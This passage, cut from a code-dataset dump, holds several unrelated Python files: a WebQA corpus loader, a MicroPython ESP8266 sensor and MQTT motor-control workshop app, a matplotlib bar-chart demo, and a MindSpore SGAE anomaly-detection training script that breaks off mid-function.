batch_eid.append(neg)\n\n _batch_size = len(batch_qid)\n batch_data = self._question_evidence(batch_qid, batch_eid)\n\n q_text, e_text, start_position, end_position = batch_data[:4]\n q_lens, e_lens, q_feature, e_feature = batch_data[4:8]\n q_keys, e_keys = batch_data[8:10]\n\n yield vars(Batch(q_text, e_text, start_position, end_position,\n q_lens, e_lens, q_feature, e_feature,\n _batch_size, q_keys, e_keys))\n\n def next_question(self):\n\n for qid in 
self.question_dict.keys():\n _, evidence_ids = self.question_dict[qid]\n _batch_size = len(evidence_ids)\n\n if _batch_size == 0:\n continue\n\n batch_data = self._question_evidence([qid] * _batch_size, evidence_ids)\n q_text, e_text, start_position, end_position = batch_data[:4]\n q_lens, e_lens, q_feature, e_feature = batch_data[4:8]\n q_keys, e_keys, q_real_text, e_real_text = batch_data[8:]\n yield BatchQuestion(q_text, e_text, start_position, end_position,\n q_lens, e_lens, q_feature, e_feature,\n _batch_size, q_keys, e_keys, e_real_text, q_real_text[0])\n\n @staticmethod\n def load_one_line_json(line, word_dict, pos_dict, ner_dict):\n data = json.loads(line)\n\n question = Question.load_one_question(data, word_dict, pos_dict, ner_dict)\n\n evidences = list()\n\n for evidence in data[\"evidences\"]:\n\n evidence_data = Evidence.load_one_evidence(evidence, word_dict, pos_dict, ner_dict)\n\n if evidence_data is None:\n continue\n\n evidences.append(evidence_data)\n\n return question, evidences\n\n @staticmethod\n def load_data_file(filename, word_dict, pos_dict, ner_dict):\n question_dict = dict()\n evidence_dict = dict()\n train_pair = list()\n count = 0\n with codecs.open(filename, 'r', 'utf8') as fin:\n\n for line in fin:\n count += 1\n\n question, evidences = WebQACorpus.load_one_line_json(line, word_dict, pos_dict, ner_dict)\n\n all_evidence = []\n no_answer = []\n has_answer = []\n for e in evidences:\n eid = \"%s||%s\" % (question.q_key, e.e_key)\n evidence_dict[eid] = e\n all_evidence.append(eid)\n\n if e.starts[0] == -1 or e.ends[0] == -1:\n no_answer.append(eid)\n else:\n has_answer.append(eid)\n\n question_dict[question.q_key] = [question, all_evidence]\n\n if count % 5000 == 0:\n print(count)\n\n if not no_answer:\n no_answer = [random.choice(list(evidence_dict.keys()))]\n if not no_answer:\n continue\n for e in has_answer:\n train_pair.append((question.q_key, e, no_answer))\n\n\n print('load data from %s, get %s qe pairs. 
' %(filename, len(train_pair)))\n\n return question_dict, evidence_dict, train_pair\n\n @staticmethod\n def load_word_dictionary(filename, word_dict=None, pos_dict=None, ner_dict=None):\n if word_dict is None:\n word_dict = Dictionary()\n word_dict.add_specials([Constants.PAD_WORD, Constants.UNK_WORD, Constants.BOS_WORD, Constants.EOS_WORD],\n [Constants.PAD, Constants.UNK, Constants.BOS, Constants.EOS])\n if pos_dict is None:\n pos_dict = Dictionary()\n pos_dict.add_specials([Constants.PAD_WORD, Constants.UNK_WORD],\n [Constants.PAD, Constants.UNK])\n if ner_dict is None:\n ner_dict = Dictionary()\n ner_dict.add_specials([Constants.PAD_WORD, Constants.UNK_WORD],\n [Constants.PAD, Constants.UNK])\n with codecs.open(filename, 'r') as fin:\n for line in fin:\n data = json.loads(line)\n for token in data[\"question_tokens\"]:\n word_dict.add(token)\n for pos in data['question_pos']:\n pos_dict.add(pos)\n for ner in data['question_ners']:\n ner_dict.add(ner)\n for evidence in data[\"evidences\"]:\n for token in evidence[\"evidence_tokens\"]:\n word_dict.add(token)\n for pos in evidence['evidence_pos']:\n pos_dict.add(pos)\n for ner in evidence['evidence_ners']:\n ner_dict.add(ner)\n\n return word_dict, pos_dict, ner_dict\n\n @staticmethod\n def load_pos_dictionary():\n return Dictionary()\n\n @staticmethod\n def load_ner_dictionary():\n return Dictionary()\n\n\nclass Batch(object):\n def __init__(self, q_text, e_text, start, end,\n q_lens, e_lens, q_feature, e_feature,\n batch_size, q_keys, e_keys):\n self.q_text = q_text\n self.e_text = e_text\n self.start_position = start\n self.end_position = end\n self.q_lens = q_lens\n self.e_lens = e_lens\n self.q_feature = q_feature\n self.e_feature = e_feature\n self.batch_size = batch_size\n self.pred = None\n self.q_keys = q_keys\n self.e_keys = e_keys\n\n\nclass BatchQuestion(object):\n def __init__(self, q_text, e_text, start, end,\n q_lens, e_lens, q_feature, e_feature,\n batch_size, q_keys, e_keys,\n evidence_raw_text=None, question_raw_text=None):\n self.q_text = q_text\n self.e_text = e_text\n self.start_position = start\n self.end_position = end\n self.q_lens = q_lens\n self.e_lens = e_lens\n self.q_feature = q_feature\n self.e_feature = e_feature\n self.batch_size = batch_size\n self.pred = None\n self.q_keys = q_keys\n self.e_keys = e_keys\n self.evidence_raw_text = evidence_raw_text\n self.question_raw_text = question_raw_text\n\n\ndef test():\n corpus = WebQACorpus(\"data/baidu_data.json\")\n for data in corpus.next_question():\n for index, (start, end, leng) in enumerate(torch.cat([data.start_position.unsqueeze(-1),\n data.end_position.unsqueeze(-1),\n data.e_lens.unsqueeze(-1)],\n 1)):\n print(''.join(data.evidence_raw_text[index][start.data[0]:end.data[0] + 1]))\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":16261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"76788454","text":"import machine\nimport utime\nimport onewire\nimport ds18x20\nimport network\nfrom umqtt.simple import MQTTClient\nimport sh1106 # https://github.com/plugowski/micropython-utils\nimport time\n\nSUBSCRIBED_TOPICS = (b'test_topic',\n b'predkosc',\n b'turbo',\n b'start')\nPWM_PIN = 14 # D5\nONE_WIRE_PIN = 12 # D6\nI2C_SCL_PIN = 5 # D1\nI2C_SDA_PIN = 4 # D2\nSAFE_RATIO = 0.6\nLOWEST_DUTY_CYCLE = 5\n\nBROKER_IP = '192.168.1.3'\nSTATION_ID = b'1'\nNETWORK_SSID = 'warsztaty_IoT'\nNETWORK_PASSWORD = 'warsztaty'\n\n\nclass IoTApp:\n 
def __init__(self):\n IoTApp.connect_to_network(NETWORK_SSID, NETWORK_PASSWORD)\n self.pwm = PwmHandler(PWM_PIN)\n self.pwm.pwm.duty(0)\n self.main_topic = b'warsztaty/stanowisko' + STATION_ID + b'/'\n self.mqtt_client = self.connect_to_mqtt_borker()\n self.temp_handler = TempHandler(ONE_WIRE_PIN)\n self.i2c_interface = machine.I2C(scl=machine.Pin(I2C_SCL_PIN), sda=machine.Pin(I2C_SDA_PIN))\n self.light_sensor = LightSensor(self.i2c_interface)\n self.light_sensor_value = self.light_sensor.read_value()\n self.oled = self.init_oled_display(self.i2c_interface)\n self.current_temp = self.temp_handler.read_temp()\n self.start_esp = False\n\n def mqtt_msg_callback(self, topic, message):\n if self.start_esp:\n if topic == self.main_topic + SUBSCRIBED_TOPICS[1]:\n response = self.pwm.duty_cycle_handler(message)\n if response['error']:\n self.mqtt_client.publish(self.mqtt_client.error_topic, response['message'])\n elif topic == self.main_topic + SUBSCRIBED_TOPICS[2]:\n response = self.pwm.turbo_mode_handler(message)\n if response['error']:\n self.mqtt_client.publish(self.mqtt_client.error_topic, response['message'])\n if topic == self.main_topic + SUBSCRIBED_TOPICS[3]:\n if message.decode().upper() == 'START':\n self.start_esp = True\n elif message.decode().upper() == 'STOP':\n self.start_esp = False\n self.pwm.pwm.duty(0)\n else:\n self.mqtt_client.publish(self.mqtt_client.error_topic, 'Aby wystartowac wyslij wiadomosc: start')\n elif topic == self.main_topic + SUBSCRIBED_TOPICS[0]:\n print('test topic message received: ' + str(message))\n\n def turn_on(self):\n while True:\n self.mqtt_client.check_msg()\n utime.sleep_ms(1000)\n if self.start_esp:\n self.current_temp = self.temp_handler.read_temp()\n self.light_sensor_value = self.light_sensor.read_value()\n self.mqtt_client.publish(self.mqtt_client.temp_topic, self.current_temp)\n self.refresh_oled()\n self.mqtt_client.publish(self.mqtt_client.light_topic, self.light_sensor_value)\n else:\n self.oled.fill(0)\n self.oled.text('STANOWISKO: ' + STATION_ID.decode(), 0, 0)\n self.oled.text('Oczekiwanie', 0, 36)\n self.oled.text('na start', 0, 48)\n self.oled.show()\n\n def refresh_oled(self):\n self.oled.fill(0)\n self.oled.show()\n self.oled.text('STANOWISKO: ' + STATION_ID.decode(), 0, 0)\n self.oled.text('temp: ' + self.current_temp.decode(), 0, 12)\n self.oled.text('predkosc: ' + str(self.pwm.duty_cycle), 0, 24)\n self.oled.text('light: ' + str(self.light_sensor_value), 0, 36)\n self.oled.show()\n\n def connect_to_mqtt_borker(self):\n mqtt_client = MQTTClient(client_id='esp8266_' + str(STATION_ID), server=BROKER_IP, port=1883)\n check = False\n while not check:\n try:\n mqtt_client.connect()\n check = True\n except Exception:\n print(b\"It is impossible to get connection to MQTT broker, please check it!\")\n utime.sleep_ms(20000)\n mqtt_client.set_callback(self.mqtt_msg_callback)\n for topic in (self.main_topic + topic for topic in SUBSCRIBED_TOPICS):\n mqtt_client.subscribe(topic)\n print(b'topic subscribed: ' + topic)\n mqtt_client.error_topic = self.main_topic + b'blad'\n mqtt_client.temp_topic = self.main_topic + b'temp'\n mqtt_client.light_topic = self.main_topic + b'czujnik_swiatla'\n return mqtt_client\n\n @staticmethod\n def connect_to_network(ssid, password):\n interface = network.WLAN(network.STA_IF)\n if not interface.isconnected():\n print('connecting to network ongoing...')\n interface.active(True)\n interface.connect(ssid, password)\n while not interface.isconnected():\n pass\n print('connection established')\n print('network config: 
', interface.ifconfig())\n\n @staticmethod\n def init_oled_display(i2c_interface):\n print('OLED display initialization...')\n display = sh1106.SH1106_I2C(128, 64, i2c_interface)\n display.fill(0)\n display.show()\n display.text('Display OK', 20, 30)\n display.show()\n return display\n\n\nclass PwmHandler:\n def __init__(self, pwm_pin):\n self.turbo_mode = False\n self.pwm = machine.PWM(machine.Pin(pwm_pin))\n self.pwm.freq(100)\n self.pwm.duty(0)\n self.duty_cycle = 0\n\n def rescale_duty_cycle(self, duty_cycle, rescale=True):\n if not rescale:\n duty_cycle = ((self.duty_cycle - LOWEST_DUTY_CYCLE) * 100)/(100-LOWEST_DUTY_CYCLE)\n if self.turbo_mode:\n duty_cycle = int((duty_cycle * (100-LOWEST_DUTY_CYCLE) / 100) + LOWEST_DUTY_CYCLE)\n else:\n duty_cycle = int(((duty_cycle * (100-LOWEST_DUTY_CYCLE) / 100) + LOWEST_DUTY_CYCLE) * SAFE_RATIO)\n\n self.duty_cycle = duty_cycle\n print('Setting new duty cycle value: {duty_cycle}'.format(\n duty_cycle=duty_cycle\n ))\n self.pwm.duty(PwmHandler.duty_cycle_percent_to_10bit_value(duty_cycle))\n self.duty_cycle = duty_cycle\n\n def duty_cycle_handler(self, message):\n response = {'error': False, 'message': ''}\n try:\n raw_duty_cycle = int(message.decode())\n except Exception:\n response['error'] = True\n response['message'] = b'Bledny format mocy silnika, obsluguje tylko wartosci 0-100, otrzymano: ' + message\n print(response['message'])\n return response\n if raw_duty_cycle>100 or raw_duty_cycle<0:\n response['error'] = True\n response['message'] = b'Bledny format mocy silnika, obsluguje tylko wartosci 0-100 otrzymano: ' + message\n return response\n self.rescale_duty_cycle(raw_duty_cycle)\n return response\n\n def turbo_mode_handler(self, message):\n response = {'error': False, 'message': ''}\n if message.upper() == b'TAK':\n self.turbo_mode = True\n print('Turbo mode turned on')\n elif message.upper() == b'NIE':\n self.turbo_mode = False\n print('Turbo mode turned off')\n else:\n response['error'] = True\n response['message'] = b'Zla wartosc, tryb turbo przyjmuje wartosci: tak lub nie'\n print(response['message'])\n self.rescale_duty_cycle(self.duty_cycle, False)\n return response\n\n @staticmethod\n def duty_cycle_percent_to_10bit_value(duty_cycle):\n return int(round(1023 * duty_cycle / 100))\n\n\nclass TempHandler:\n def __init__(self, one_wire_pin):\n self.temp_sensor = self.init_temperature_sensor(one_wire_pin)\n self.message = self.read_temp()\n\n def init_temperature_sensor(self, pin):\n print('temperature sensor initialization...')\n onewire_pin = machine.Pin(pin)\n check = False\n while not check:\n try:\n sensor = ds18x20.DS18X20(onewire.OneWire(onewire_pin))\n check = True\n except Exception:\n print('Problem with sensor initialization, check connection!')\n time.sleep(2)\n return sensor\n\n def read_temp(self):\n print(b'temperature reading...')\n roms = self.temp_sensor.scan()\n self.temp_sensor.convert_temp()\n utime.sleep_ms(750)\n temp = str(round(self.temp_sensor.read_temp(roms[0]), 2)).encode()\n print(b'current temperature: ' + temp)\n return temp\n\n\nclass LightSensor:\n def __init__(self, i2c_interface):\n self.i2c = i2c_interface\n self.init_light_sensor()\n\n def init_light_sensor(self):\n check = False\n while not check:\n try:\n print(b'light sensor initialization...')\n CONTINOUS_HRES1 = 0x10\n mode = CONTINOUS_HRES1\n i2c_addr=0x23\n self.i2c.writeto(i2c_addr, b\"\\x00\")\n self.i2c.writeto(i2c_addr, b\"\\x01\")\n self.i2c.writeto(i2c_addr, bytes([mode]))\n utime.sleep_ms(180)\n check = True\n except Exception:\n 
print(b'Problem with light sensor initialization!!!, check it!')\n\n def read_value(self):\n measure_value = self.i2c.readfrom(0x23, 2)\n lux = ((measure_value[0] << 8) | measure_value[1])/1.2\n print('Light = {0}lux'.format(lux))\n return str(round(lux, 2))\n\n\niot_app = IoTApp()\niot_app.turn_on()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"221808159","text":"import matplotlib.pyplot as plt \r\nimport numpy as np\r\n\r\n# Sample Data\r\ndata = {\r\n\t'Item A' : 19438,\r\n\t'Item B' : 19352,\r\n\t'Item C' : 11641,\r\n\t'Item D' : 19414,\r\n\t'Item E' : 13219,\r\n\t'Item F' : 16518,\r\n\t'Item G' : 13161,\r\n\t'Item H' : 19641,\r\n\t'Item I' : 19196,\r\n\t'Item J' : 13512,\r\n}\r\nitem = tuple(data.keys())\r\ncount = tuple(data.values())\r\n\r\n# Simple Plot\r\nfig, ax = plt.subplots()\r\nax.barh(item, count)\r\n\r\n# Pengaturan Style \r\nplt.style.use('seaborn')\r\n\r\n# Penambahan Garis (V/H)\r\nax.axvline(np.mean(count), ls='--', color='red')\r\n# ls = line style\r\n\r\nplt.show()","sub_path":"16-Plot-Lifecycle/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"347056514","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n'''eval dataset with SGAE model'''\nimport os\nimport time\nimport numpy as np\nfrom sklearn.metrics import average_precision_score, roc_auc_score\nimport pandas as pd\nfrom tqdm import tqdm\nfrom src.SGAE import SGAE\nfrom dataloader import LoadDocumentData, LoadImageData, LoadTabularData\nimport mindspore as ms\nfrom mindspore import nn\nfrom mindspore import Model\nfrom mindspore import ops\nfrom mindspore.train.callback import LossMonitor, TimeMonitor, Callback\nfrom mindspore import context, Tensor\nfrom mindspore import dtype as mstype\nfrom mindspore import load_checkpoint, load_param_into_net\nfrom dataset import create_dataset\nfrom model_utils.config import config as cfg\n\n\nclass CustomWithEvalCell(nn.Cell):\n \"\"\" CustomWithEvalCell \"\"\"\n def __init__(self, network):\n super(CustomWithEvalCell, self).__init__(auto_prefix=False)\n self.network = network\n\n def construct(self, data, label):\n scores, _, _ = self.network(data)\n return scores, label\n\n\nclass AUC_PR(nn.Metric):\n ''' AUC_PR '''\n\n def __init__(self):\n super(AUC_PR, self).__init__()\n self.clear()\n\n def clear(self):\n pass\n\n def update(self, *inputs):\n scores = inputs[0].asnumpy()\n y = inputs[1].asnumpy()\n\n self.auc = roc_auc_score(y, scores)\n self.pr = average_precision_score(y, scores)\n\n def eval(self):\n return self.auc, self.pr\n\n\nbest_auc = 0\nbest_pr = 0\n\n\nclass EvalCallback(Callback):\n \"\"\"\n Evaluation per epoch, and save the best AUC_PR checkpoint.\n \"\"\"\n\n 
def __init__(self, model, eval_ds, save_path=\"./\"):\n\n global best_auc\n global best_pr\n\n self.model = model\n self.eval_ds = eval_ds\n self.best_auc = best_auc\n self.best_pr = best_pr\n self.save_path = save_path\n self.print = ops.Print()\n\n def epoch_end(self, run_context):\n ''' epoch_end '''\n global best_auc\n global best_pr\n\n cb_params = run_context.original_args()\n cur_epoch = cb_params.cur_epoch_num\n res = self.model.eval(self.eval_ds)\n auc = res[\"auc_pr\"][0]\n pr = res[\"auc_pr\"][1]\n if auc+pr > self.best_auc + self.best_pr:\n self.best_pr = pr\n self.best_auc = auc\n best_auc = auc\n best_pr = pr\n if params_.data_name not in ['reuters', '20news']:\n ms.save_checkpoint(cb_params.train_network, \\\nos.path.join(self.save_path, f\"{data_name}_best_auc_pr_runs{run_index}.ckpt\"))\n else:\n ms.save_checkpoint(cb_params.train_network, os.path.join(self.save_path, \\\nf\"{data_name}_best_auc_pr_runs{run_index}_normal{normal_index}.ckpt\"))\n\n self.print(\"the best epoch is\", cur_epoch,\n \"best auc pr is\", self.best_auc, self.best_pr)\n\n\nclass CustomWithLossCell(nn.Cell):\n ''' CustomWithLossCell '''\n\n def __init__(self, backbone, norm_thresh, params):\n super(CustomWithLossCell, self).__init__(auto_prefix=False)\n self._backbone = backbone\n self.norm_thresh = norm_thresh\n self.params = params\n self.print = ops.Print()\n\n def construct(self, x, label):\n\n scores, x_dec, _ = self._backbone(x)\n anomal_flag = recog_anomal(\n x, x_dec, self.norm_thresh).astype(mstype.int32)\n recon_error = ms.numpy.mean(ms.numpy.multiply(x - x_dec, x - x_dec))\n dist_error = self.compute_dist_error(scores, anomal_flag, self.params)\n loss = recon_error + self.params['lam_dist'] * dist_error\n return loss\n\n def compute_dist_error(self, scores, anomal_flag, params):\n \"\"\" compute distance error \"\"\"\n ref = ms.numpy.randn((1000,))\n dev = scores - ms.numpy.mean(ref)\n inlier_loss = ms.numpy.absolute(dev)\n # outlier loss\n anomal_flag = ms.numpy.expand_dims(anomal_flag, 1)\n outlier_loss = ms.numpy.absolute(ms.numpy.maximum(\n params['a'] - scores, ms.numpy.zeros(scores.shape)))\n dist_error = ms.numpy.mean(\n (1 - anomal_flag) * inlier_loss + params['lam_out'] * anomal_flag * outlier_loss)\n return dist_error\n\n\nrun_index = 0\ndata_name = 0\n\n\ndef train_tabular(params):\n \"\"\" train tabular \"\"\"\n global params_\n params_ = params\n\n for _ in range(10):\n params.np_seed += 1\n\n x_train, y_train, x_val, y_val, x_test, y_test = LoadTabularData(\n params)\n x_train_whole = Tensor(x_train, dtype=mstype.float32)\n x_test_whole = Tensor(x_test, dtype=mstype.float32)\n y_test = y_test.astype(np.int32)\n y_val = y_val.astype(np.int32)\n y_train = y_train.astype(np.int32)\n auc = np.zeros(params.run_num)\n ap = np.zeros(params.run_num)\n global data_name\n data_name = params.data_name\n\n # Start Train\n for run_idx in tqdm(range(params.run_num)):\n start_time = time.time()\n global best_auc\n global best_pr\n global run_index\n run_index = run_idx\n best_auc = 0\n best_pr = 0\n model = SGAE(x_train_whole.shape[1], params.hidden_dim)\n optim = nn.Adam(model.trainable_params(), learning_rate=params.lr)\n\n if params.verbose and run_idx == 0:\n print(model)\n\n # One run\n for epoch in range(params.epochs):\n ds_train = create_dataset(x_train, y_train, params)\n ds_val = create_dataset(x_val, y_val, params, is_batch=False)\n\n epoch_time_start = time.time()\n\n # calculate norm thresh\n _, dec_train, _ = model(x_train_whole)\n norm = calculate_norm(x_train_whole, 
dec_train)\n norm_thresh = np.percentile(norm, params.epsilon)\n\n loss = 0\n recon_error = 0\n dist_error = 0\n\n auc_pr = AUC_PR()\n model_withloss = CustomWithLossCell(\n model, norm_thresh, vars(params))\n eval_net = CustomWithEvalCell(model)\n if params.device == \"Ascend\":\n model_withloss = Model(model_withloss, optimizer=optim, \\\n eval_network=eval_net, metrics={'auc_pr': auc_pr}, amp_level=\"O3\")\n else:\n model_withloss = Model(\n model_withloss, optimizer=optim, eval_network=eval_net, metrics={'auc_pr': auc_pr})\n\n eval_callback = EvalCallback(\n model_withloss, ds_val, save_path=\"./saved_model\")\n num_batches = ds_train.get_dataset_size()\n model_withloss.train(epoch=1, train_dataset=ds_train, callbacks=[TimeMonitor(\n 30), LossMonitor(100), eval_callback], dataset_sink_mode=False)\n print(\n f'Time cost per step is {(time.time() - start_time)/(num_batches)} seconds\\n')\n\n epoch_time = time.time() - epoch_time_start\n\n if params.verbose:\n if (epoch + 1) % params.print_step == 0 or epoch == 0:\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc_ = roc_auc_score(y_test, scores)\n ap_ = average_precision_score(y_test, scores)\n print(f'Epoch num:[{epoch+1}/{params.epochs}], Time:{epoch_time:.3f} ' +\\\n f'--Loss:{loss:.3f}, --RE:{recon_error:.3f}, --DE:{dist_error:.3f}, \\\n --DE_r:{dist_error*params.lam_dist:.3f},' +\\\n f'--AUC:{auc_:.3f} --AP:{ap_:.3f}')\n\n # Early Stop\n if params.early_stop:\n scores, _, _ = model(x_train_whole)\n scores = scores.asnumpy()\n if np.mean(scores) > params.a / 2:\n print(\n f'Early Stop at Epoch={epoch+1}, AUC={auc[run_idx]:.3f}')\n break\n\n # test\n param_dict = load_checkpoint(\n f\"./saved_model/{params.data_name}_best_auc_pr_runs{run_index}.ckpt\")\n load_param_into_net(model, param_dict)\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc[run_idx] = roc_auc_score(y_test, scores)\n ap[run_idx] = average_precision_score(y_test, scores)\n\n print(\n f'This run finished, AUC={auc[run_idx]:.3f}, AP={ap[run_idx]:.3f}')\n # RUN JUMP\n if run_idx > 5 and np.mean(auc[:run_idx]) < 0.5:\n print('RUN JUMP')\n print(f'Average AUC is : {np.mean(auc[:run_idx]):.3f}')\n print(f'AUC is : {auc}')\n break\n print(f'Train Finished, AUC={np.mean(auc):.3f}({np.std(auc):.3f}), AP=\\\n {np.mean(ap):.3f}({np.std(ap):.3f}),np_seed={params.np_seed}')\n return {'AUC': f'{np.mean(auc):.3f}({np.std(auc):.3f})', 'AP': f'{np.mean(ap):.3f}({np.std(ap):.3f})'}\n\n\nparams_ = {}\n\n\ndef train_image(params):\n ''' train image '''\n global params_\n params_ = params\n\n # Load data\n x_train, x_test, y_train, y_test = LoadImageData(params)\n x_train_whole = Tensor(x_train, dtype=mstype.float32)\n x_test_whole = Tensor(x_test, dtype=mstype.float32)\n\n auc = np.zeros(params.run_num)\n ap = np.zeros(params.run_num)\n\n global data_name\n data_name = params.data_name\n\n # Start Train\n for run_idx in tqdm(range(params.run_num)):\n global best_auc\n global best_pr\n global run_index\n run_index = run_idx\n best_auc = 0\n best_pr = 0\n model = SGAE(x_train_whole.shape[1], params.hidden_dim)\n optim = nn.Adam(model.trainable_params(), learning_rate=params.lr)\n\n if params.verbose and run_idx == 0:\n print(model)\n\n # One run\n for epoch in range(params.epochs):\n ds_train = create_dataset(x_train, y_train, params)\n ds_val = create_dataset(x_test, y_test, params, is_batch=False)\n\n epoch_time_start = time.time()\n # train\n\n # calculate norm thresh\n _, dec_train, _ = model(x_train_whole)\n norm = calculate_norm(x_train_whole, 
dec_train)\n norm_thresh = np.percentile(norm, params.epsilon)\n\n loss = 0\n recon_error = 0\n dist_error = 0\n\n auc_pr = AUC_PR()\n model_withloss = CustomWithLossCell(model, norm_thresh, params)\n eval_net = CustomWithEvalCell(model)\n model_withloss = Model(\n model_withloss, optimizer=optim, eval_network=eval_net, metrics={'auc_pr': auc_pr})\n eval_callback = EvalCallback(\n model_withloss, ds_val, save_path=\"./saved_model\")\n model_withloss.train(epoch=1, train_dataset=ds_train, callbacks=\\\n [TimeMonitor(30), LossMonitor(30), eval_callback], dataset_sink_mode=False)\n\n epoch_time = time.time() - epoch_time_start\n\n # test\n if params.verbose:\n if (epoch + 1) % params.print_step == 0 or epoch == 0:\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc_ = roc_auc_score(y_test, scores)\n ap_ = average_precision_score(y_test, scores)\n print(f'Epoch num:[{epoch+1}/{params.epochs}], Time:{epoch_time:.3f} ' +\\\n f'--Loss:{loss:.3f}, --RE:{recon_error:.3f}, --DE:\\\n {dist_error:.3f}, --DE_r:{dist_error*params.lam_dist:.3f},' +\\\n f'--AUC:{auc_:.3f} --AP:{ap_:.3f}')\n\n # Early Stop\n if params.early_stop:\n scores, _, _ = model(x_train_whole)\n scores = scores.asnumpy()\n if np.mean(scores) > params.a / 2:\n print(\n f'Early Stop at Epoch={epoch+1}, AUC={auc[run_idx]:.3f}')\n break\n\n # test\n param_dict = load_checkpoint(\n f\"./saved_model/{params.data_name}_best_auc_pr_runs{run_index}.ckpt\")\n load_param_into_net(model, param_dict)\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc[run_idx] = roc_auc_score(y_test, scores)\n ap[run_idx] = average_precision_score(y_test, scores)\n\n print(\n f'This run finished, AUC={auc[run_idx]:.3f}, AP={ap[run_idx]:.3f}')\n\n # RUN JUMP\n if run_idx > 5 and np.mean(auc[:run_idx]) < 0.5:\n print('RUN JUMP')\n print(f'Average AUC is : {np.mean(auc[:run_idx]):.3f}')\n print(f'AUC is : {auc}')\n break\n\n print(\n f'Train Finished, AUC={np.mean(auc):.3f}({np.std(auc):.3f}), AP={np.mean(ap):.3f}({np.std(ap):.3f})')\n return {'AUC': f'{np.mean(auc):.3f}({np.std(auc):.3f})', 'AP': f'{np.mean(ap):.3f}({np.std(ap):.3f})'}\n\n\nnormal_index = 0\n\n\ndef train_document(params):\n ''' train document '''\n global params_\n params_ = params\n\n # Load data\n dataloader = LoadDocumentData(params)\n\n auc = np.zeros((params.run_num, dataloader.class_num))\n ap = np.zeros((params.run_num, dataloader.class_num))\n\n global data_name\n data_name = params.data_name\n\n # Start Train\n for run_idx in tqdm(range(params.run_num)):\n\n global run_index\n run_index = run_idx\n for normal_idx in range(dataloader.class_num):\n\n global best_auc\n global best_pr\n global normal_index\n best_auc = 0\n best_pr = 0\n normal_index = normal_idx\n\n x_train, x_test, y_train, y_test = dataloader.preprocess(\n normal_idx)\n x_train_whole = Tensor(x_train, dtype=mstype.float32)\n x_test_whole = Tensor(x_test, dtype=mstype.float32)\n\n model = SGAE(x_train_whole.shape[1], params.hidden_dim)\n optim = nn.Adam(model.trainable_params(), learning_rate=params.lr)\n\n if params.verbose and normal_idx == 0 and run_idx == 0:\n print(model)\n\n # One run\n for epoch in range(params.epochs):\n\n ds_train = create_dataset(x_train, y_train, params)\n ds_val = create_dataset(x_test, y_test, params, is_batch=False)\n\n epoch_time_start = time.time()\n\n # calculate norm thresh\n _, dec_train, _ = model(x_train_whole)\n norm = calculate_norm(x_train_whole, dec_train)\n norm_thresh = np.percentile(norm, params.epsilon)\n\n loss = 0\n recon_error = 0\n 
dist_error = 0\n\n auc_pr = AUC_PR()\n model_withloss = CustomWithLossCell(model, norm_thresh, params)\n eval_net = CustomWithEvalCell(model)\n model_withloss = Model(\n model_withloss, optimizer=optim, eval_network=eval_net, metrics={'auc_pr': auc_pr})\n eval_callback = EvalCallback(\n model_withloss, ds_val, save_path=\"./saved_model\")\n model_withloss.train(epoch=1, train_dataset=ds_train, callbacks=\\\n[TimeMonitor(30), LossMonitor(1), eval_callback], dataset_sink_mode=False)\n epoch_time = time.time() - epoch_time_start\n\n # test\n if params.verbose:\n if (epoch + 1) % params.print_step == 0 or epoch == 0:\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc_ = roc_auc_score(y_test, scores)\n ap_ = average_precision_score(y_test, scores)\n print(f'Epoch num:[{epoch+1}/{params.epochs}], Time:{epoch_time:.3f} ' +\\\n f'--Loss:{loss:.3f}, --RE:{recon_error:.3f}, --\\\n DE:{dist_error:.3f}, --DE_r:{dist_error*params.lam_dist:.3f},' +\\\n f'--AUC:{auc_:.3f} --AP:{ap_:.3f}')\n # Early Stop\n if params.early_stop:\n scores, _, _ = model(x_train_whole)\n scores = scores.asnumpy()\n if np.mean(scores) > params.a / 2:\n print(\n f'Early Stop at Epoch={epoch+1}, AUC={auc[run_idx]:.3f}')\n break\n\n # test\n param_dict = \\\n load_checkpoint(f\"./saved_model/{params.data_name}\"+\\\n\"_best_auc_pr_runs{run_index}_normal{normal_idx}.ckpt\")\n load_param_into_net(model, param_dict)\n scores, _, _ = model(x_test_whole)\n scores = scores.asnumpy()\n auc[run_idx][normal_idx] = roc_auc_score(y_test, scores)\n ap[run_idx][normal_idx] = average_precision_score(y_test, scores)\n print(\n f'This run finished, AUC={np.mean(auc[run_idx]):.3f}, AP={np.mean(ap[run_idx]):.3f}')\n\n # RUN JUMP\n if run_idx > 5 and np.mean(auc[:run_idx]) < 0.5:\n print('RUN JUMP')\n print(f'Average AUC is : {np.mean(auc[:run_idx]):.3f}')\n print(f'AUC is : {auc}')\n break\n\n print(\n f'Train Finished, AUC={np.mean(auc):.3f}({np.std(auc):.3f}), AP={np.mean(ap):.3f}({np.std(ap):.3f})')\n return {'AUC': f'{np.mean(auc):.3f}({np.std(auc):.3f})', 'AP': f'{np.mean(ap):.3f}({np.std(ap):.3f})'}\n\n\ndef recog_anomal(data, x_dec, thresh):\n ''' Recognize anomaly\n '''\n norm = calculate_norm(data, x_dec)\n anomal_flag = norm.copy()\n anomal_flag[norm < thresh] = 0\n anomal_flag[norm >= thresh] = 1\n return anomal_flag\n\n\ndef calculate_norm(data, x_dec):\n ''' Calculate l2 norm\n '''\n delta = (data - 